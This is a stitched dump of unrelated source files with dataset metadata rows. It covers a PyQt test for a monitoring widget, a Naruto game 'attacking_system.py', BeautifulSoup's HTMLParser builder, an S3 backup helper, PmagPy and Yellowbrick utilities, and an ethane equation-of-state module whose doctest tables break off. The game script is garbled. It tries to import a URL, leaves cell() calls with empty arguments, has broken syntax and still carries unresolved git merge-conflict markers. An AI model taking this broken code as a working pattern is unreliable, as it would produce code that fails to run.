| bsd-3-clause | 668,505,785,645,585,400 | 41.475758 | 105 | 0.552615 | false |
Alignak-monitoring-contrib/alignak-app | test/test_service_widget.py | 1 | 5477 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2015-2018:
# Matthieu Estrada, [email protected]
#
# This file is part of (AlignakApp).
#
# (AlignakApp) is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# (AlignakApp) is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with (AlignakApp). If not, see <http://www.gnu.org/licenses/>.
import sys
import unittest2
from PyQt5.Qt import QApplication, QLabel, QPushButton, QWidget
from alignak_app.backend.datamanager import data_manager
from alignak_app.items.host import Host
from alignak_app.items.service import Service
from alignak_app.items.user import User
from alignak_app.utils.config import settings
from alignak_app.locales.locales import init_localization
from alignak_app.qobjects.service.service import ServiceDataQWidget
settings.init_config()
init_localization()
app = QApplication(sys.argv)
user = User()
user.create('_id', {'name': 'name'}, 'name')
data_manager.database['user'] = user
class TestServiceDataQWidget(unittest2.TestCase):
"""
This file test methods of ServiceDataQWidget class object
"""
# Host data test
host_list = []
for i in range(0, 10):
host = Host()
host.create(
'_id%d' % i,
{
'name': 'host%d' % i,
'_id': '_id%d' % i,
'passive_checks_enabled': False,
'active_checks_enabled': True
},
'host%d' % i
)
host_list.append(host)
# Service data test
service_list = []
for i in range(0, 10):
service = Service()
service.create(
'_id%d' % i,
{
'name': 'service%d' % i,
'alias': 'service %d' % i,
'_id': '_id%d' % i,
'host': '_id%d' % i,
'ls_acknowledged': False,
'ls_downtimed': False,
'ls_state': 'OK',
'aggregation': 'disk',
'ls_last_check': 123456789,
'ls_output': 'All is ok',
'business_impact': 2,
'passive_checks_enabled': False,
'active_checks_enabled': True
},
'service%d' % i
)
service_list.append(service)
service = Service()
service.create(
'other_id2%d' % i,
{
'name': 'other_service2%d' % i,
'_id': 'other_id2%d' % i,
'host': '_id%d' % i,
'ls_acknowledged': False,
'ls_downtimed': False,
'ls_state': 'CRITICAL',
'aggregation': 'CPU',
'passive_checks_enabled': False,
'active_checks_enabled': True
},
'other_service%d' % i
)
service_list.append(service)
@classmethod
def setUpClass(cls):
"""Create QApplication"""
try:
cls.app = QApplication(sys.argv)
except:
pass
def test_initialize(self):
"""Initialize ServiceDataQWidget"""
under_test = ServiceDataQWidget()
self.assertIsNone(under_test.service_item)
self.assertIsNotNone(under_test.labels)
for label in under_test.labels:
self.assertIsInstance(under_test.labels[label], QLabel)
self.assertIsNotNone(under_test.buttons)
for button in under_test.buttons:
self.assertIsInstance(under_test.buttons[button], QPushButton)
under_test.initialize()
self.assertIsNone(under_test.service_item)
self.assertIsNotNone(under_test.labels)
for label in under_test.labels:
self.assertIsInstance(under_test.labels[label], QLabel)
self.assertIsNotNone(under_test.buttons)
for button in under_test.buttons:
self.assertIsInstance(under_test.buttons[button], QPushButton)
# Assert QWidget is Hidden for first display
self.assertTrue(under_test.isHidden())
def test_get_icon_widget(self):
"""Get Icon QWidget ServiceDataQWidget"""
service_data_widget_test = ServiceDataQWidget()
under_test = service_data_widget_test.get_service_icon_widget()
self.assertIsInstance(under_test, QWidget)
def test_update_widget(self):
"""Update ServiceData QWidget"""
under_test = ServiceDataQWidget()
under_test.initialize()
old_labels = {}
# Store QLabel.text() = ''
for label in under_test.labels:
old_labels[label] = under_test.labels[label]
data_manager.database['user'].data['can_submit_commands'] = True
data_manager.update_database('service', self.service_list)
under_test.update_widget(self.service_list[0])
new_labels = under_test.labels
# Assert labels have been filled by update
for label in old_labels:
self.assertNotEqual(new_labels[label].text(), old_labels[label])
| agpl-3.0 | -1,748,505,908,918,247,700 | 29.943503 | 77 | 0.590834 | false |
TheMuffinMan5930/NarutoBattle | attacking_system.py | 1 | 1259 | import gspread
import "https://github.com/TheMuffinMan5930/NarutoBattle/blob/master/Chat.py"
Jitsu_Player = sh.worksheet(Player_Name + "- Jitsus")
i = 1
while True:
exec("Jit" + i + " = worksheet.acell(" + i.string.ascii_uppercase.index(i - 1).value + "2)")
i += 1
confirmation_of_jitsus = input("Is it correct that you have {}, {}, {}, {}, {}, {}, {} as your ttjitsus? Y/N".format(Jit1, Jit2, Jit3, Jit4, Jit5, Jit6, Jit7))
if confirmation_of_jitsus == Y
worksheet.update.cell("Ready")
elif confirmation_of_jitsus == N
QuitGame() # Def this aswell
except:
print("Error")
# turn progressing code here
# this is just the code I CAN do.
class Attack(object)
def __init__(self)
self.coordinates_of_Jitsu = wsJitsus.cell( : , :)
self.range = wsJitsus.cell( , ,)#blah, Blah plus syntax check for 19 - 22ish
self.damage = wsJitsus.cell( , ,)
self.chakra_cost = wsJitsus.cell( , ,) #other attributes
self.aim = wsJitsus.cell( , ,)
self.Jitsu_Name = wsJitsus.cell( , ,)
self.purchase_cost = wsJitsus.cell( , ,)
self.Jitsu_Rank = wsJitsus.cell( , ,)
<<<<<<< HEAD:Attacking System.py
def __str__(self)
return("Your Jitsu has {}d".format(Jitsu))
=======
>>>>>>> 7723f44702a9a1e3e4c3431c136d1ad136bda8c4:attacking_system.py
| mit | -8,263,799,134,107,539,000 | 37.030303 | 159 | 0.661355 | false |
chimkentec/KodiMODo_rep | script.module.xbmcup/lib/xbmcup/bsoup4/builder/_htmlparser.py | 1 | 8347 | """Use the HTMLParser library to parse HTML files that aren't too bad."""
__all__ = [
'HTMLParserTreeBuilder',
]
from HTMLParser import (
HTMLParser,
HTMLParseError,
)
import sys
import warnings
# Starting in Python 3.2, the HTMLParser constructor takes a 'strict'
# argument, which we'd like to set to False. Unfortunately,
# http://bugs.python.org/issue13273 makes strict=True a better bet
# before Python 3.2.3.
#
# At the end of this file, we monkeypatch HTMLParser so that
# strict=True works well on Python 3.2.2.
major, minor, release = sys.version_info[:3]
CONSTRUCTOR_TAKES_STRICT = (
major > 3
or (major == 3 and minor > 2)
or (major == 3 and minor == 2 and release >= 3))
from ..element import (
CData,
Comment,
Declaration,
Doctype,
ProcessingInstruction,
)
from ..dammit import EntitySubstitution, UnicodeDammit
from ..builder import (
HTML,
HTMLTreeBuilder,
STRICT,
)
HTMLPARSER = 'html.parser'
class BeautifulSoupHTMLParser(HTMLParser):
def handle_starttag(self, name, attrs):
# XXX namespace
self.soup.handle_starttag(name, None, None, dict(attrs))
def handle_endtag(self, name):
self.soup.handle_endtag(name)
def handle_data(self, data):
self.soup.handle_data(data)
def handle_charref(self, name):
# XXX workaround for a bug in HTMLParser. Remove this once
# it's fixed.
if name.startswith('x'):
real_name = int(name.lstrip('x'), 16)
else:
real_name = int(name)
try:
data = unichr(real_name)
except (ValueError, OverflowError), e:
data = u"\N{REPLACEMENT CHARACTER}"
self.handle_data(data)
def handle_entityref(self, name):
character = EntitySubstitution.HTML_ENTITY_TO_CHARACTER.get(name)
if character is not None:
data = character
else:
data = "&%s;" % name
self.handle_data(data)
def handle_comment(self, data):
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(Comment)
def handle_decl(self, data):
self.soup.endData()
if data.startswith("DOCTYPE "):
data = data[len("DOCTYPE "):]
self.soup.handle_data(data)
self.soup.endData(Doctype)
def unknown_decl(self, data):
if data.upper().startswith('CDATA['):
cls = CData
data = data[len('CDATA['):]
else:
cls = Declaration
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(cls)
def handle_pi(self, data):
self.soup.endData()
if data.endswith("?") and data.lower().startswith("xml"):
# "An XHTML processing instruction using the trailing '?'
# will cause the '?' to be included in data." - HTMLParser
# docs.
#
# Strip the question mark so we don't end up with two
# question marks.
data = data[:-1]
self.soup.handle_data(data)
self.soup.endData(ProcessingInstruction)
class HTMLParserTreeBuilder(HTMLTreeBuilder):
is_xml = False
features = [HTML, STRICT, HTMLPARSER]
def __init__(self, *args, **kwargs):
if CONSTRUCTOR_TAKES_STRICT:
kwargs['strict'] = False
self.parser_args = (args, kwargs)
def prepare_markup(self, markup, user_specified_encoding=None,
document_declared_encoding=None):
"""
:return: A 4-tuple (markup, original encoding, encoding
declared within markup, whether any characters had to be
replaced with REPLACEMENT CHARACTER).
"""
if isinstance(markup, unicode):
return markup, None, None, False
try_encodings = [user_specified_encoding, document_declared_encoding]
dammit = UnicodeDammit(markup, try_encodings, is_html=True)
return (dammit.markup, dammit.original_encoding,
dammit.declared_html_encoding,
dammit.contains_replacement_characters)
def feed(self, markup):
args, kwargs = self.parser_args
parser = BeautifulSoupHTMLParser(*args, **kwargs)
parser.soup = self.soup
try:
parser.feed(markup)
except HTMLParseError, e:
warnings.warn(RuntimeWarning(
"Python's built-in HTMLParser cannot parse the given document. This is not a bug in Beautiful Soup. The best solution is to install an external parser (lxml or html5lib), and use Beautiful Soup with that parser. See http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-a-parser for help."))
raise e
# Patch 3.2 versions of HTMLParser earlier than 3.2.3 to use some
# 3.2.3 code. This ensures they don't treat markup like <p></p> as a
# string.
#
# XXX This code can be removed once most Python 3 users are on 3.2.3.
if major == 3 and minor == 2 and not CONSTRUCTOR_TAKES_STRICT:
import re
attrfind_tolerant = re.compile(
r'\s*((?<=[\'"\s])[^\s/>][^\s/=>]*)(\s*=+\s*'
r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?')
HTMLParserTreeBuilder.attrfind_tolerant = attrfind_tolerant
locatestarttagend = re.compile(r"""
<[a-zA-Z][-.a-zA-Z0-9:_]* # tag name
(?:\s+ # whitespace before attribute name
(?:[a-zA-Z_][-.:a-zA-Z0-9_]* # attribute name
(?:\s*=\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|\"[^\"]*\" # LIT-enclosed value
|[^'\">\s]+ # bare value
)
)?
)
)*
\s* # trailing whitespace
""", re.VERBOSE)
BeautifulSoupHTMLParser.locatestarttagend = locatestarttagend
from html.parser import tagfind, attrfind
def parse_starttag(self, i):
self.__starttag_text = None
endpos = self.check_for_whole_start_tag(i)
if endpos < 0:
return endpos
rawdata = self.rawdata
self.__starttag_text = rawdata[i:endpos]
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
match = tagfind.match(rawdata, i+1)
assert match, 'unexpected call to parse_starttag()'
k = match.end()
self.lasttag = tag = rawdata[i+1:k].lower()
while k < endpos:
if self.strict:
m = attrfind.match(rawdata, k)
else:
m = attrfind_tolerant.match(rawdata, k)
if not m:
break
attrname, rest, attrvalue = m.group(1, 2, 3)
if not rest:
attrvalue = None
elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
attrvalue[:1] == '"' == attrvalue[-1:]:
attrvalue = attrvalue[1:-1]
if attrvalue:
attrvalue = self.unescape(attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = m.end()
end = rawdata[k:endpos].strip()
if end not in (">", "/>"):
lineno, offset = self.getpos()
if "\n" in self.__starttag_text:
lineno = lineno + self.__starttag_text.count("\n")
offset = len(self.__starttag_text) \
- self.__starttag_text.rfind("\n")
else:
offset = offset + len(self.__starttag_text)
if self.strict:
self.error("junk characters in start tag: %r"
% (rawdata[k:endpos][:20],))
self.handle_data(rawdata[i:endpos])
return endpos
if end.endswith('/>'):
# XHTML-style empty tag: <span attr="value" />
self.handle_startendtag(tag, attrs)
else:
self.handle_starttag(tag, attrs)
if tag in self.CDATA_CONTENT_ELEMENTS:
self.set_cdata_mode(tag)
return endpos
def set_cdata_mode(self, elem):
self.cdata_elem = elem.lower()
self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)
BeautifulSoupHTMLParser.parse_starttag = parse_starttag
BeautifulSoupHTMLParser.set_cdata_mode = set_cdata_mode
CONSTRUCTOR_TAKES_STRICT = True
| gpl-3.0 | -4,245,565,650,335,776,300 | 33.209016 | 318 | 0.567988 | false |
nyodas/enjoliver | app/objs3.py | 1 | 2316 | """
Interface with S3 to store / fetch backups
"""
import os
import time
import boto3
import logger
from configs import EnjoliverConfig
class S3Operator(object):
log = logger.get_logger(__file__)
def __init__(self, bucket_name):
ec = EnjoliverConfig(importer=__file__)
aws_id = ec.aws_id
aws_secret = ec.aws_secret
self.bucket_name = bucket_name
if not bucket_name:
self.log.error("bucket_name=%s" % bucket_name)
raise AttributeError("bucket_name is not defined: %s" % bucket_name)
if aws_id is None or aws_secret is None:
self.log.error("Missing the couple AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY")
raise EnvironmentError("Missing the couple AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY")
self.log.info("connect to bucket name: %s" % bucket_name)
self.s3 = boto3.resource('s3')
self.bucket = self.s3.Bucket(bucket_name)
def upload(self, source, dest):
if os.path.isfile(source) is False:
raise IOError(source)
obj = self.s3.Object(self.bucket_name, dest)
stats = os.stat(source)
metadata = {
"uploaded": "%d" % time.time(),
"created": "%d" % stats.st_ctime,
"modified": "%d" % stats.st_mtime,
"size": "%d" % stats.st_size
}
obj.put(Body=open(source, 'rb'), Metadata=metadata)
self.log.info("upload done source: %s dest: %s metadata: %s" % (source, dest, metadata))
def download(self, source, dest):
obj = self.s3.Object(self.bucket_name, source)
r = obj.get(dest)
with open(dest, 'wb') as f:
f.write(r['Body']._raw_stream.data)
self.log.info("download done source: %s source: %s" % (source, dest))
def get_last_uploaded(self, prefix):
keys = []
self.log.debug("prefix use %s" % prefix)
for item in self.bucket.objects.all():
self.log.debug("list in bucket: %s" % item.key)
keys.append({"key": item.key, "last_modified": item.last_modified})
keys.sort(key=lambda k: k["last_modified"])
keys.reverse()
latest = keys[0]
key_name = latest["key"]
self.log.info("return latest upload: %s" % key_name)
return key_name
| mit | 7,340,518,615,331,652,000 | 33.058824 | 96 | 0.584629 | false |
PmagPy/PmagPy | programs/histplot.py | 1 | 1769 | #!/usr/bin/env python
from pmagpy import pmag
from pmagpy import pmagplotlib
from matplotlib import pyplot as plt
import sys
import os
import numpy as np
import matplotlib
if matplotlib.get_backend() != "TKAgg":
matplotlib.use("TKAgg")
from pmagpy import ipmag
def main():
"""
NAME
histplot.py
DESCRIPTION
makes histograms for data
OPTIONS
-h prints help message and quits
-f input file name
-b binsize
-fmt [svg,png,pdf,eps,jpg] specify format for image, default is svg
-sav save figure and quit
-F output file name, default is hist.fmt
-N don't normalize
-twin plot both normalized and un-normalized y axes
-xlab Label of X axis
-ylab Label of Y axis
INPUT FORMAT
single variable
SYNTAX
histplot.py [command line options] [<file]
"""
interactive = True
save_plots = False
if '-sav' in sys.argv:
save_plots = True
interactive = False
if '-h' in sys.argv:
print(main.__doc__)
sys.exit()
fmt = pmag.get_named_arg('-fmt', 'svg')
fname = pmag.get_named_arg('-f', '')
outfile = pmag.get_named_arg("-F", "")
norm = 1
if '-N' in sys.argv:
norm = 0
if '-twin' in sys.argv:
norm = - 1
binsize = pmag.get_named_arg('-b', 0)
if '-xlab' in sys.argv:
ind = sys.argv.index('-xlab')
xlab = sys.argv[ind+1]
else:
xlab = 'x'
data = []
if not fname:
print('-I- Trying to read from stdin... <ctrl>-c to quit')
data = np.loadtxt(sys.stdin, dtype=np.float)
ipmag.histplot(fname, data, outfile, xlab, binsize, norm,
fmt, save_plots, interactive)
if __name__ == "__main__":
main()
| bsd-3-clause | 3,270,431,581,391,425,500 | 23.232877 | 74 | 0.58225 | false |
pdamodaran/yellowbrick | yellowbrick/utils/helpers.py | 1 | 6103 | # yellowbrick.utils.helpers
# Helper functions and generic utilities for use in Yellowbrick code.
#
# Author: Benjamin Bengfort <[email protected]>
# Created: Fri May 19 10:39:30 2017 -0700
#
# Copyright (C) 2017 District Data Labs
# For license information, see LICENSE.txt
#
# ID: helpers.py [79cd8cf] [email protected] $
"""
Helper functions and generic utilities for use in Yellowbrick code.
"""
##########################################################################
## Imports
##########################################################################
import re
import numpy as np
from sklearn.pipeline import Pipeline
from .types import is_estimator
from yellowbrick.exceptions import YellowbrickTypeError
##########################################################################
## Model and Feature Information
##########################################################################
def get_model_name(model):
"""
Detects the model name for a Scikit-Learn model or pipeline.
Parameters
----------
model: class or instance
The object to determine the name for. If the model is an estimator it
returns the class name; if it is a Pipeline it returns the class name
of the final transformer or estimator in the Pipeline.
Returns
-------
name : string
The name of the model or pipeline.
"""
if not is_estimator(model):
raise YellowbrickTypeError(
"Cannot detect the model name for non estimator: '{}'".format(
type(model)
)
)
else:
if isinstance(model, Pipeline):
return get_model_name(model.steps[-1][-1])
else:
return model.__class__.__name__
def has_ndarray_int_columns(features, X):
""" Checks if numeric feature columns exist in ndarray """
_, ncols = X.shape
if not all(d.isdigit() for d in features if isinstance(d, str)) or not isinstance(X, np.ndarray):
return False
ndarray_columns = np.arange(0, ncols)
feature_cols = np.unique([int(d) for d in features])
return all(np.in1d(feature_cols, ndarray_columns))
# Alias for closer name to isinstance and issubclass
hasndarrayintcolumns = has_ndarray_int_columns
def is_monotonic(a, increasing=True):
"""
Tests whether a vector a has monotonicity.
Parameters
----------
a : array-like
Array that should be tested for monotonicity
increasing : bool, default: True
Test if the array is montonically increasing, otherwise test if the
array is montonically decreasing.
"""
a = np.asarray(a) # ensure a is array-like
if a.ndim > 1:
raise ValueError("not supported for multi-dimensonal arrays")
if len(a) <= 1:
return True
if increasing:
return np.all(a[1:] >= a[:-1], axis=0)
return np.all(a[1:] <= a[:-1], axis=0)
##########################################################################
## Numeric Computations
##########################################################################
#From here: http://stackoverflow.com/questions/26248654/numpy-return-0-with-divide-by-zero
def div_safe( numerator, denominator ):
"""
Ufunc-extension that returns 0 instead of nan when dividing numpy arrays
Parameters
----------
numerator: array-like
denominator: scalar or array-like that can be validly divided by the numerator
returns a numpy array
example: div_safe( [-1, 0, 1], 0 ) == [0, 0, 0]
"""
#First handle scalars
if np.isscalar(numerator):
raise ValueError("div_safe should only be used with an array-like numerator")
#Then numpy arrays
try:
with np.errstate(divide='ignore', invalid='ignore'):
result = np.true_divide( numerator, denominator )
result[ ~ np.isfinite( result )] = 0 # -inf inf NaN
return result
except ValueError as e:
raise e
def prop_to_size(vals, mi=0.0, ma=5.0, power=0.5, log=False):
"""
Converts an array of property values (e.g. a metric or score) to values
that are more useful for marker sizes, line widths, or other visual
sizes. The new sizes are computed as:
y = mi + (ma -mi)(\frac{x_i - min(x){max(x) - min(x)})^{power}
If ``log=True``, the natural logarithm of the property values is used instead.
Parameters
----------
prop : array-like, 1D
An array of values of the property to scale between the size range.
mi : float, default: 0.0
The size to assign the smallest property (minimum size value).
ma : float, default: 5.0
The size to assign the largest property (maximum size value).
power : float, default: 0.5
Used to control how rapidly the size increases from smallest to largest.
log : bool, default: False
Use the natural logarithm to compute the property sizes
Returns
-------
sizes : array, 1D
The new size values, in the same shape as the input prop array
"""
# ensure that prop is an array
vals = np.asarray(vals)
# apply natural log if specified
if log:
vals = np.log(vals)
# avoid division by zero error
delta = vals.max() - vals.min()
if delta == 0.0:
delta = 1.0
return mi + (ma-mi) * ((vals -vals.min()) / delta) ** power
##########################################################################
## String Computations
##########################################################################
def slugify(text):
"""
Returns a slug of given text, normalizing unicode data for file-safe
strings. Used for deciding where to write images to disk.
Parameters
----------
text : string
The string to slugify
Returns
-------
slug : string
A normalized slug representation of the text
.. seealso:: http://yashchandra.com/2014/05/08/how-to-generate-clean-url-or-a-slug-in-python/
"""
slug = re.sub(r'[^\w]+', ' ', text)
slug = "-".join(slug.lower().strip().split())
return slug
| apache-2.0 | 4,644,387,337,907,354,000 | 28.626214 | 101 | 0.574144 | false |
edusegzy/pychemqt | lib/mEoS/C2.py | 1 | 34267 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from lib.meos import MEoS
from lib import unidades
class C2(MEoS):
"""Multiparameter equation of state for ethane"""
name = "ethane"
CASNumber = "74-84-0"
formula = "CH3CH3"
synonym = "R-170"
rhoc = unidades.Density(206.18)
Tc = unidades.Temperature(305.322)
Pc = unidades.Pressure(4872.2, "kPa")
M = 30.06904 # g/mol
Tt = unidades.Temperature(90.368)
Tb = unidades.Temperature(184.569)
f_acent = 0.0995
momentoDipolar = unidades.DipoleMoment(0.0, "Debye")
id = 3
_Tr = unidades.Temperature(295.159630)
_rhor = unidades.Density(207.557649)
_w = 0.095234716
Fi1 = {"R": 8.314472,
"ao_log": [1, 3.003039265],
"pow": [0, 1],
"ao_pow": [9.212802589, -4.68224855],
"ao_exp": [1.117433359, 3.467773215, 6.941944640, 5.970850948],
"titao": [1.4091052332, 4.0099170712, 6.5967098342, 13.9798102659]}
Fi2 = {"ao_log": [1, 3.00263],
"pow": [0, 1],
"ao_pow": [24.675437527, -77.42531376],
"ao_exp": [], "titao": [],
"ao_hyp": [4.33939, 1.23722, 13.1974, -6.01989],
"hyp": [1.831882406, 0.731306621, 3.378007481, 3.508721939]}
Fi3 = {"ao_log": [1, 3.8159476],
"pow": [0, -1./3, -2./3, -1],
"ao_pow": [-23.446765, 8.6021299, -3.3075735, -.55956678],
"ao_exp": [5.0722267], "titao": [5.5074874],
"ao_hyp": [], "hyp": []}
CP5 = {"ao": 9.9507922459,
"an": [-6.9341406909e5, 3.1534834135e4, -6.103375287e2,
-2.8657877948e-2, 9.0922897821e-5, -5.2750109915e-8],
"pow": [-3, -2, -1.001, 1, 2, 3],
"ao_exp": [-1.4243593411e1], "exp": [3000],
"ao_hyp": [], "hyp": []}
helmholtz1 = {
"__type__": "Helmholtz",
"__name__": "Helmholtz equation of state for ethane of Buecker and Wagner (2006)",
"__doi__": {"autor": "Bücker, D., Wagner, W.",
"title": "A Reference Equation of State for the Thermodynamic Properties of Ethane for Temperatures from the Melting Line to 675 K and Pressures up to 900 MPa",
"ref": "J. Phys. Chem. Ref. Data 35, 205 (2006)",
"doi": "10.1063/1.1859286"},
"__test__":
# Table 29, Pag 238
"""
>>> st=C2(T=90.368, x=0.5)
>>> print "%0.6g %0.7f %0.5f %0.6f %0.5g %0.5g %0.4g %0.4g %0.4g %0.3f %0.4g %0.4g %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
90.368 0.0000011 651.52948 0.000046 -888.9 -294.12 -5.058 1.524 1.605 0.892 2.326 1.168 2008.69 180.93
>>> st=C2(T=100, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.4g %0.4g %0.4g %0.3f %0.4g %0.4g %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
100 0.000011 640.94852 0.00040 -866.74 -282.78 -4.825 1.015 1.541 0.911 2.283 1.187 1938.44 189.86
>>> st=C2(T=130, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
130 0.001284 607.82999 0.03576 -798.36 -246.43 -4.227 0.019 1.462 0.977 2.293 1.256 1722.03 214.69
>>> st=C2(T=150, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
150 0.009638 585.16884 0.23373 -752.12 -221.71 -3.896 -0.360 1.442 1.027 2.333 1.312 1575.53 228.84
>>> st=C2(T=180, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
180 0.078638 549.50874 1.62533 -680.84 -185.53 -3.464 -0.712 1.434 1.098 2.421 1.409 1350.47 245.54
>>> st=C2(T=210, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
210 0.333796 510.45075 6.23900 -605.9 -153.48 -3.081 -0.927 1.454 1.228 2.572 1.622 1117.27 254.02
>>> st=C2(T=240, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
240 0.966788 465.30887 17.43487 -524.72 -128.82 -2.726 -1.077 1.507 1.388 2.847 1.976 873.25 252.14
>>> st=C2(T=270, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
270 2.209980 407.71776 42.08922 -432.13 -118.38 -2.375 -1.212 1.605 1.595 3.491 2.815 608.92 237.02
>>> st=C2(T=300, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
300 4.357255 303.50879 114.50091 -305.32 -155.61 -1.952 -1.453 1.912 2.089 10.022 13.299 274.91 200.51
>>> st=C2(T=305, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
305 4.839225 241.96149 170.75482 -255.73 -202.19 -1.794 -1.619 2.470 2.623 164.093 247.460 175.12 178.83
"""
# Table 30, Pag 243
"""
>>> st=C2(T=90.384, P=1e5)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
90.384 651.55 -888.88 -888.73 -5.0574 1.6051 2.3256 2008.97
>>> st=C2(T=135, P=5e5)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
135 602.5 -787.09 -786.26 -4.1415 1.4563 2.3009 1688.21
>>> st=C2(T=220, P=1e6)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
220 497.12 -581.36 -579.35 -2.9641 1.4681 2.6365 1044.02
>>> st=C2(T=110, P=1.5e6)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
